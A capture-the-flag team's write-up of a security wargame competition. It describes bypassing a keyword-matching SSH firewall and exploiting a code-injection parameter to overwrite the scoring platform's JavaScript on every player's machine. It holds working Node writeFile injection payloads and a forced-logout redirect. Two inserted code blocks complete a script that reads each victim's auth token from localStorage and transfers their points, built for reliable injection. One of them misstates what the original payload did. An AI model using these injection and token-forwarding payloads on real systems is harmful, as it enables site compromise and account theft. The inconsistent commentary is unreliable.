• First of all: Who are we?!

We are a team of independent security researchers, bug hunters and developers working separately at various tech companies, and we like to play CTFs from time to time. This is a writeup of the last competition we entered, in which we took first place [Team r3billions]!


M.Ghobashy - K.Amin - M.Monim - S.Aziz - Alaa

• Brief about the competition

The Arab Security Wargames championship is a cyber security challenge that simulates a realistic cyber attack scenario for the participants. It demands strong skills across all security fields (networks, web, reverse engineering and digital forensics) and allows 4-5 participants per team.

This competition is not like a regular CTF: it requires more interaction with other devices and participants. It was made up of four phases, the last being the Attack/Defense phase, in which each team could steal points from the other teams using a vulnerability they had to uncover themselves.

Let's start! _Time: 1:30 pm_

Before the competition started, based on our experience in last year's edition, we decided that four of us would start on the challenges while one would monitor the platform's requests and look for any vulnerability we could use.

After 5 minutes, our team member found an API GET request that returned data about all participants and their ids, and it also returned the challenges' flags and hints!!

Weird, huh?! But it was expected given the history of the competition.
We tried submitting some flags and they worked, but we didn't submit them all at once, so as not to alert the other teams that we had found something.

Teams and Users’ Wallets

Our focus now was on the vulnerability that would let us steal other teams' points, but we also wanted to have fun and solve the challenges.
Eventually we got some really interesting findings on both roads! But first, let's understand how the wallets work...

Every user has a wallet_id where they store the points gained when they solve a challenge, and the whole team has another wallet_id to which they should all send their points in order to be counted on the scoreboard and ranked accordingly.

In last year's competition there was a vulnerability that allowed stealing points from the teams' wallets. Since we didn't know this year's vulnerability yet, nor whether it would target the users' wallets or the teams', we decided to divide the points among ourselves, so that another team couldn't steal them all at once if they found a way in.

2 Hours Later

Challenges

Meanwhile, we worked on other challenges and solved some of them, and we unlocked a challenge called Gate One Z worth 450 points. After reading the challenge we understood that we should ask a Guardian (one of the competition organizers) for credentials to an application called Gate One Z, which in turn gave us SSH access to a Raspberry Pi running Linux, where the SSH credentials were the same for everyone!

In a nutshell, all we had to do was reboot the system, write our team's name inside the Raspberry Pi and defend it so that nobody else could access it and do the same. The problem was that Gate One Z is a firewall restricting some of the commands we tried over the SSH access we were given.
We tried "ls" and got the error "Unauthorized"; we tried "reboot" and the same error came back.

Bypass

So this indeed needed to be bypassed! After some trials we created a Python file and tried to execute the commands from inside it; the file's content was like this:

import os
os.system("ls")

The firewall scanned the file for words in its dictionary, and since "ls" is one of them, it didn't work.
We then edited the file as follows:

import os
os.system("l"+"s")

but that didn't work either. However, when we ran the command directly in an interactive Python shell, using single quotes, and executed this:

>>> import os
>>> os.system('l'+'s')

It worked!!!
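To show why a dictionary-based command gate like the one above gives way so easily, here is an added example that is not part of the original writeup and not Gate One Z's own code (its internals were never visible to us): a gate that string-matches the text it receives, the same gate after folding string concatenation, and an allowlist on the invoked command. The blocked words, the allowed commands and the sample inputs are made up for the demo.

```javascript
// Added example, not Gate One Z's code (its internals were never visible): a model
// of a dictionary-based command gate and of why text matching cannot be trusted.
// Blocked words, allowed commands and the sample inputs are made up for the demo.
const BLOCKED_WORDS = ['ls', 'reboot', 'passwd'];

// The gate as the writeup describes it: reject input containing a blocked word.
function substringGate(input) {
  return !BLOCKED_WORDS.some(function (word) { return input.includes(word); });
}

// Fold adjacent string literals joined by "+" ('l'+'s' -> 'ls') before matching,
// so the gate inspects the value the interpreter will build rather than the text.
// Handles plain literals only (no escapes), which is enough to show the idea.
function foldLiterals(src) {
  const pair = /(["'])([^"']*)\1\s*\+\s*(["'])([^"']*)\3/;
  let previous;
  do {
    previous = src;
    src = src.replace(pair, function (_m, quote, left, _q, right) {
      return quote + left + right + quote;
    });
  } while (src !== previous);
  return src;
}

function foldingGate(input) {
  return substringGate(foldLiterals(input));
}

// The design that does not play whack-a-mole: decide on the program actually
// invoked (argv[0]) against an allowlist, not on words found in arbitrary text.
const ALLOWED_COMMANDS = new Set(['echo', 'whoami', 'uptime']);

function allowlistGate(commandLine) {
  const argv = commandLine.trim().split(/\s+/).filter(Boolean);
  return argv.length > 0 && ALLOWED_COMMANDS.has(argv[0]);
}

// Sample inputs: the two from the writeup plus one that defeats folding as well.
const SAMPLES = [
  "os.system('ls')",               // caught by both text gates
  "os.system('l'+'s')",            // passes the substring gate, caught after folding
  "os.system(chr(108)+chr(115))",  // passes both: the value only exists at run time
];

for (const sample of SAMPLES) {
  console.log(sample, '-> substring:', substringGate(sample), 'folding:', foldingGate(sample));
}
for (const cmd of ['ls -la', 'echo hi', 'python3 run.py']) {
  console.log(cmd, '-> allowlist:', allowlistGate(cmd));
}
```

The allowlist is only as strong as its weakest entry: the gate on the Pi still let an interactive python through, and a general-purpose interpreter turns any allowlist into a full shell, which is exactly what the REPL trick exploited. For an SSH jump box the right tool is a forced command or restricted shell enforced by sshd itself (ForceCommand in sshd_config, or command= in authorized_keys), not word matching on what the user types.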

We had now bypassed the firewall and could execute unauthorized commands; next we needed to write our name into the /etc/motd file and change the SSH password so that no one else could get in.

When we tried to edit the file we couldn't overwrite it: nano ran, but the write didn't succeed. So we created a file with our name on the machine's desktop and just changed the password.
We also discovered an unintended flaw in the firewall, but we can't discuss it further until the fix is deployed.

3 Hours Later

The last phase started with us in 1st place, after we were instructed to submit all our points to the team wallet.

Attack & Defense Phase

All teams were connected to the same network, each on a different VLAN; even the platform itself was running locally on that network.
Meanwhile, we were working on another challenge called Glass Eye, which said there was a machine (a camera) in the same room, connected to our network, which we needed to access and look through to get the flag.

Brute-forcing the network's IPs was not feasible, but we were told the machine was visible to all teams, so we scanned the VLAN the platform was on. We found 6 live IPs, one of which was suspicious: while monitoring the platform we had seen 3 JS files, and one of them was fetched by a request to that very IP, 10.0.0.25:4000!!
So it was our chance to dig deeper.

After reviewing all 3 JS files we couldn't find anything interesting, but what about the request sent to 10.0.0.25:4000?!
The request looked like this:

GET /js/script.js?latest=true

We tried fuzzing the latest parameter for code injection, and here we are!!
We were able to overwrite the JS file that the platform loads on every other participant's laptop!!
-> Theoretically, we should then be able to inject JS code that sends points to our team's wallet whenever it runs on another participant's device.

At this point it was 6:00 pm, which meant we only had 30 minutes left!!!

These 30 minutes could decide the champion if someone managed to exploit this before us and steal our points! We couldn't hide our points in the users' wallets either, because if another team ended up with the same score and submitted it first, they would be 1st and we would be 2nd.

Defense Technique

To protect ourselves from being robbed while we wrote the malicious script, we turned off JavaScript in our browsers, so that if anybody got there before us they wouldn't be able to exploit the vulnerability against our team.

And now … The Attack !!

We first tried this payload:

require('fs').writeFile("script.js", "js goes here", function(err){})

We succeeded in creating a file called script.js, but the served file was not overwritten; the primary file was still there... After some fuzzing we discovered the problem: we hadn't given the file's path relative to the server's root (fs.writeFile resolves a relative path against the server process's working directory, not the directory the file is served from). After writing this payload:

require('fs').writeFile("public/js/script.js", "js goes here", function(err){})

The original file was replaced with whatever we wanted, and the code we wrote ran on all the participants' devices!! Now to the next phase..

Stealing Points

The Guardians gave all teams a hint: we couldn't simply take points from other teams, we had to make them send the points to our wallet_id. So we had to write JS code to do exactly that, and we wrote this payload:

require('fs').writeFile("public/js/script.js", "var xhttp = new XMLHttpRequest(); xhttp.open('POST', '/send/our_wallet_id', true); xhttp.send('{\"points\":\"200\"}');", function(err){})

But unfortunately it didn't work! We discovered that there was an authorization header, Ticket, that had to be sent along with the request. The platform kept the token in localStorage, where any script running on the page can read it, so we should have edited the payload to set that header (after open and before send) like this:

require('fs').writeFile("public/js/script.js", "var xhttp = new XMLHttpRequest(); xhttp.open('POST', '/send/our_wallet_id', true); xhttp.setRequestHeader('Ticket', localStorage.getItem('token')); xhttp.send('{\"points\":\"200\"}');", function(err){})

But by then we only had 5 minutes left and couldn't finish it in time. Instead we thought of an easy way to keep the other participants from using the platform and discovering the vulnerability: simply log them out of their accounts as soon as the JS code executed, with this payload:

require('fs').writeFile("public/js/script.js", "location.href='//10.0.0.35:3000/login#';", function(err){})

Then we finished with a final touch: an alert popup with our team's name (r3billions rules), shown to all the participants to acknowledge how far we had come!
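The transfer script and the Node injection that carries it, written out as an added example rather than the payload the team ran in the last five minutes: the wallet id, the points value, the /send endpoint and the login URL are taken from the writeup; the FakeXHR test double, the localStorage key name token, and the choice to redirect only once the transfer has completed are assumptions. It shows the header ordering XMLHttpRequest requires and uses JSON.stringify to nest the script inside the writeFile argument, so nested quotes cannot break the payload.

```javascript
// Added example, not the payload the team ran: the browser-side transfer script,
// the test double used to exercise it outside a browser, and the Node injection
// wrapper that carries it. Wallet id, points, the /send endpoint and the login URL
// come from the writeup; the token key 'token' and everything else are assumptions.

// Runs in each participant's browser. XHR and storage are parameters so the same
// function can be driven by a fake here; in script.js they are XMLHttpRequest and
// localStorage (a token kept in localStorage is readable by any script on the page).
function transferPoints(XHR, storage, walletId, points, onDone) {
  var xhttp = new XHR();
  xhttp.onload = function () { if (onDone) onDone(xhttp.status); };
  xhttp.open('POST', '/send/' + walletId, true);
  // Headers are only accepted between open() and send(); setting Ticket after
  // send(), as the original payload did, throws InvalidStateError in a browser.
  xhttp.setRequestHeader('Ticket', storage.getItem('token'));
  xhttp.setRequestHeader('Content-Type', 'application/json');
  xhttp.send(JSON.stringify({ points: String(points) }));
  return xhttp;
}

// Minimal stand-in for XMLHttpRequest that enforces the same state rule.
class FakeXHR {
  constructor() { this.calls = []; this.headers = {}; this.opened = false; this.sent = false; this.status = 0; }
  open(method, url) { this.calls.push('open'); this.method = method; this.url = url; this.opened = true; }
  setRequestHeader(name, value) {
    if (!this.opened || this.sent) throw new Error('InvalidStateError');
    this.calls.push('setRequestHeader'); this.headers[name] = value;
  }
  send(body) {
    this.calls.push('send'); this.body = body; this.sent = true; this.status = 200;
    if (this.onload) this.onload();
  }
}

// Serialise the function above into the body that script.js will hold, then send
// the victim to the login page only once the transfer has completed (a redirect
// issued right after send() can cancel the in-flight request).
function buildScriptBody(walletId, points, loginUrl) {
  return '(' + transferPoints.toString() + ')(XMLHttpRequest, localStorage, ' +
    JSON.stringify(walletId) + ', ' + JSON.stringify(String(points)) +
    ', function () { location.href = ' + JSON.stringify(loginUrl) + '; });\n';
}

// Wrap the body in the writeFile call that the ?latest= sink evaluates.
// JSON.stringify yields a valid JS string literal, so quotes and newlines in the
// body cannot break out of the argument (the failure mode of hand-escaping).
function buildInjection(scriptBody) {
  return "require('fs').writeFile('public/js/script.js', " +
    JSON.stringify(scriptBody) + ', function (err) {})';
}

// Stand-alone demo with a fake browser environment.
const demoStorage = { getItem: function (key) { return key === 'token' ? 'TICKET-demo' : null; } };
const demoXhr = transferPoints(FakeXHR, demoStorage, 'our_wallet_id', 200, function (status) {
  console.log('transfer finished with status', status);
});
console.log('calls in order:', demoXhr.calls.join(' -> '));
console.log(buildInjection(buildScriptBody('our_wallet_id', 200, '//10.0.0.35:3000/login#')));
```

The FakeXHR double is there to make the ordering mistake visible offline: swap the setRequestHeader call to after send() and it throws, just as a browser would. On the defending side, the same ticket being readable from localStorage is what made the attack possible at all; a session credential the server accepts only from an HttpOnly cookie plus an origin check on /send would have left an injected script with nothing to forward.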

Finally!!

Time ran out and we were still at the top of the scoreboard. The competition ended with our name on all the participants' screens and with nobody else having discovered the vulnerability!

The next day we received the tournament cup at the ceremony, along with the grand prize of 75,000 L.E!!

Takeaways

1- Teamwork always leads to results.
2- There is always an alternative way to achieve your goal.
3- The art of exploitation is as important as the ability to discover vulnerabilities.
4- Knowing your team members' strengths and taking advantage of them is a must.

Thank you for Reading.